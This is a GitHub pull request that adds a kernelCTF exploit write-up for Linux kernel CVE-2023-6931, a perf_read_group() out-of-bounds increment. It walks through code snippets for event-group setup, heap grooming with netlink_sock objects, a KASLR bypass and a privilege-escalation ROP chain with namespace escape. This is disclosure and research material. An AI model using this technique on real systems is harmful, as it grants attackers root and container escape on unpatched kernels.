Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add kernelCTF CVE-2023-6931_lts_cos #135

Open
wants to merge 10 commits into
base: master
Choose a base branch
from
Open
Show file tree
Hide file tree
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
160 changes: 160 additions & 0 deletions pocs/linux/kernelctf/CVE-2023-6931_lts_cos/docs/exploit.md
Original file line number Diff line number Diff line change
@@ -0,0 +1,160 @@
# CVE-2023-6931
## Overview

The vulnerability allows multiple out-of-bounds increments at controlled offsets from the end of an array. We allocate a `netlink_sock` object in front of a vulnerable array and increment two of its function pointers. One of the modified pointers is then called to bypass KASLR and the other to execute a ROP chain placed in the slot previously occupied by the vulnerable array.

## Performance Counters Background

The `perf_event_open()` syscall is used to measure information about a target process. The `perf_event_attr` argument specifies what to measure in the `.type` and `.config` fields. Since the kernelCTF instances are virtualized, only events that use the software PMU (`.type = PERF_TYPE_SOFTWARE` or `.type = PERF_TYPE_BREAKPOINT`) can be created. We will use events with `.type = PERF_TYPE_SOFTWARE` and `.config = PERF_COUNT_SW_PAGE_FAULTS` to count the number of page faults in the exploit process.

`perf_event_open()` returns a file descriptor which can be `read()` to get the event count. The perf event will only perform measurements while it is active. It can be activated and deactivated with `ioctl()` or the `.disabled` field in `perf_event_attr`.

Events can created as part of a group by passing the file descriptor of a group leader event to `perf_event_open()`. Events in the group will only be measured if the group leader is also active. If an event in the group has the `PERF_FORMAT_GROUP` flag in its `perf_event_attr`'s `.read_format` field, it will output an array with the counts of all events in the group when `read()`. The out-of-bounds increments occur while preparing this array in `perf_read_group()`.

## Setting up the Vulnerable Event Group

We want to create an event group large enough to overflow the group leader's 16-bit `read_size`, which is passed to `kmalloc()` in `perf_read_group()` to allocate the `values` array. Each event takes up 8 bytes of `values` after an 8-byte header, so 8191 events will make `read_size` overflow. Adding 256 more events sets `read_size` to 2048 so that `values` is allocated in `kmalloc-2048`.

The group leader is created with `read_format = PERF_FORMAT_GROUP` so that `perf_read_group()` is used when reading it, and the rest of the events are created with `read_format = 0` to avoid checks that prevent the group leader's `read_size` from overflowing:

```
/* Create group leader event */
attr.read_format = PERF_FORMAT_GROUP;
attr.disabled = 0;
sib_fds[0] = perf_event_open(&attr, ppid, -1, -1, 0);

/* Create sibling events */
attr.read_format = 0;
attr.disabled = 1;
/* ... */
```

The `perf_event` associated with `sib_fds[n]` will have its `count` field added to `values[n+1]` in `perf_read_group()`, so the events from `sib_fd[255]` to `sib_fd[511]` will do out-of-bounds increments on the slot directly after `values`. We want to increment two locations in this slot, corresponding to the event fds `TFD1` and `TFD2` in the exploit.

We create the events up to `TFD2` and then set the `count` fields of `TFD1` and `TFD2` using `inc_counters()`:

```
for (int i = 1; i <= TFD2; i++)
sib_fds[i] = perf_event_open(&attr, ppid, -1, sib_fds[0], 0);

inc_counters(sib_fds[TFD1], NUM_INCS1);
inc_counters(sib_fds[TFD2], NUM_INCS2);
```

Since the events are created with `attr.type = PERF_COUNT_SW_PAGE_FAULTS`, their `count` is incremented every time there is a page fault. `inc_counters()` enables the passed event, does the required number of page faults, then disables the event:

```
void inc_counters (int fd, int inc) {
ioctl(fd, PERF_EVENT_IOC_ENABLE, 0);
for (int i = 0; i < inc; i++) {
char *m = mmap(NULL, 4096, PROT_READ | PROT_WRITE, MAP_ANON | MAP_PRIVATE, -1, 0);
m[0] = 0; /* Page fault */
}
ioctl(fd, PERF_EVENT_IOC_DISABLE, 0);
}
```
After this the rest of the events are created. The target instances have a hard limit of 4096 open file descriptors for each process, so more processes are forked off to create enough events. Three processes create 2048 events each:

```
for (int i = 0; i < 3; i++) {
pid_t cpid = fork();
if (cpid)
continue;
for (int j = 1; j <= 2048; j++)
sib_fds[j] = perf_event_open(&attr, ppid, -1, sib_fds[0], 0);
sleep(-1);
}
```
The parent process can check how many sibling events have been created by calling `read()` on the group leader. This is used to wait for the child processes to finish:
```
while (num_events <= 2048*3 + TFD2) {
read(sib_fds[0], read_buf, 65536);
num_events = read_buf[0];
}
```
The final events are then created in the parent process, overflowing `read_size`. Now `read()`ing the group leader will allocate a `values` array and do out-of-bounds increments at the chosen offsets.

## Preparing the Heap

The vulnerable array should be allocated in a slab with one empty slot and all other slots containing a `netlink_sock` object. Since the `kmalloc-2048` cache where `netlink_sock` is allocated has 16 slots per slab, the buffer will have a 15 in 16 chance of being behind a `netlink_sock` within the slab.

This is achieved in three steps:

### Fill Partial Slabs

A large number of `simple_xattr` objects are allocated in `kmalloc-2048` to fill the existing partial slabs. An unknown number of `simple_xattr`s will be left over in the active slab of the current CPU.

### Create Target Slabs

We want to create a number of target slabs greater than the number of objects per slab (see the next section for why). There are 16 objects per slab in `kmalloc-2048`, so creating `2*16*16` `netlink_sock` objects is more than enough. One in 16 of the allocated `netlink_sock`s are freed, leaving us with 31 slabs that all have one free slot and 15 slots containing a `netlink_sock`. Unless we happened to exactly fill all partial slabs in the first step, the 32nd slab created (which will be the active slab) will have more than one empty slot.

`netlink_sock` is freed after an RCU delay, so `membarrier(MEMBARRIER_CMD_GLOBAL, 0)` is used to wait for the `netlink_sock`s to be freed before continuing. The originally submitted exploit used a more complicated approach to achieve the same heap state without freeing any `netlink_sock`s, avoiding this wait, but this did not actually improve reliablity over the simpler method used here.

### Fill the Active Slab

The active slab has an unknown number of empty slots which have to be filled to reach the target slab at the head of the partial slab list. Enough `simple_xattr`s are sprayed to fill the active slab. Some of them will overflow into the empty slots of target slabs after the active slab is filled, which is why it was necessary create more target slabs than there are objects per slab.

## Triggering the Vulnerability

`read()`ing the group leader allocates the `values` array in `kmalloc-2048` and increments two locations in the next slot, corresponding to the `netlink_bind` and `sk.sk_write_space` fields of `netlink_sock`. Before being incremented these are set to `rtnetlink_bind()` and `sock_def_write_space()`, respectively.

`netlink_bind` is incremented by `0x0f` and will be called to leak the kernel base. `sk.sk_write_space` is incremented to point to `__sk_destruct()` and will be called to execute a ROP chain.

The `values` array is freed in `perf_read_group()` immediately after it does the OOB increments.

## KASLR Bypass

Here we exploit the fact that `rax` is used to store both the return value and the jump target of an indirect call. Adding `0x0f` to `rtnetlink_bind()` points it at the nearest return instruction, so calling `rtnetlink_bind + 0x0f` simply returns without doing anything. The return value in `eax` will contain the lower 32 bits of `rtnetlink_bind + 0x0f`, from which the kernel base address can be inferred.

The `netlink_bind` pointer of a `netlink_sock` is called by `netlink_setsockopt()` during the system call `setsockopt(sockfd, SOL_NETLINK, NETLINK_ADD_MEMBERSHIP, optval, optlen)`. When our corrupted pointer is called this way and returns the lower 32 bits of `rtnetlink_bind + 0x0f`, it is interpreted as an error code and passed to user space in the return value of `setsockopt()`.

If none of the sprayed `netlink_socks`s returns an error, we know that the OOB increment did not hit. Since whatever memory it did increment didn't crash the kernel, we can try again.

## ROP Chain

After being incremented, `sk.sk_write_space` points to `__sk_destruct()`. It can be called via `sk_setsockopt()` using the syscall `setsockopt(sockfd, SOL_SOCKET, SO_SNDBUF, optval, optlen)`.
`__sk_destruct()` may be scheduled with `call_rcu()`, so it takes an `rcu_head *head` argument and uses `container_of(head, struct sock, sk_rcu)` to get a `sock` pointer:

```
static void __sk_destruct(struct rcu_head *head)
{
struct sock *sk = container_of(head, struct sock, sk_rcu);
struct sk_filter *filter;

if (sk->sk_destruct)
sk->sk_destruct(sk);

/* ... */
}
```


When we call `__sk_destruct()` through `sk.sk_write_space`, `head` will be a pointer to base of the victim `netlink_sock`. Then `container_of()` returns a pointer to the middle of the previous slot, which used to contain the vulnerable `values` array.

We spray `simple_xattr`s to fill this slot with a fake `sock` containing a ROP chain. `__sk_destruct` will call the `sk_destruct` function pointer of the fake `sock`, which we set to the address of a gadget that pivots to the ROP chain at the start of the `sock`, whose address is contained in `rbp`:

```
mov rsp, rbp ; pop rbp ; jmp __x86_return_thunk
```

The ROP chain performs privilege escalation and namespace escape then ends with a [telefork](https://blog.kylebot.net/2022/10/16/CVE-2022-1786/index.html "https://blog.kylebot.net/2022/10/16/CVE-2022-1786/index.html"):

```
0
pop rdi ; jmp __x86_return_thunk
0
prepare_kernel_cred()
mov rdi, rax ; pop rbx ; jmp __x86_return_thunk
0
commit_creds()
pop rdi ; jmp __x86_return_thunk
1
find_task_by_vpid()
pop rsi ; jmp __x86_return_thunk
init_nsproxy
mov rdi, rax ; pop rbx ; jmp __x86_return_thunk
0
switch_task_namespaces()
do_sys_vfork()
msleep()
```
Original file line number Diff line number Diff line change
@@ -0,0 +1,5 @@
When a `perf_event` has the `PERF_FORMAT_GROUP` flag set in its `read_format`, each event added to its group increases its `read_size`. Since `read_size` is a `u16`, adding a few thousand events can cause an integer overflow. There is a check in `perf_validate_size()` to prevent an event from being added to a group if its `read_size` would be too large, but the `read_size` of the events already in the group can also increase and is not checked. An integer overflow can be caused by creating an event with `PERF_FORMAT_GROUP` and then adding events without `PERF_FORMAT_GROUP` to its group until the first event's `read_size` overflows.

`perf_read_group()` allocates a buffer using an event's `read_size`, then iterates through the `sibling_list`, incrementing and possibly writing to successive `u64` entries in the buffer. Overflowing `read_size` causes `perf_read_group()` to increment/write memory outside of the heap allocation.

The bug was introduced in `fa8c269353d5 ("perf/core: Invert perf_read_group() loops")` in 3.16 and partially fixed shortly after in `a723968c0ed3 ("perf: Fix u16 overflows")`. It was fixed in `382c27f4ed28 (perf: Fix perf_event_validate_size())` in 6.7.
Original file line number Diff line number Diff line change
@@ -0,0 +1,6 @@
CFLAGS = -Wno-incompatible-pointer-types -Wno-format -Wno-int-conversion -static

exploit: exploit.c

run:
while :; do ./exploit; done
Binary file not shown.
Loading
Loading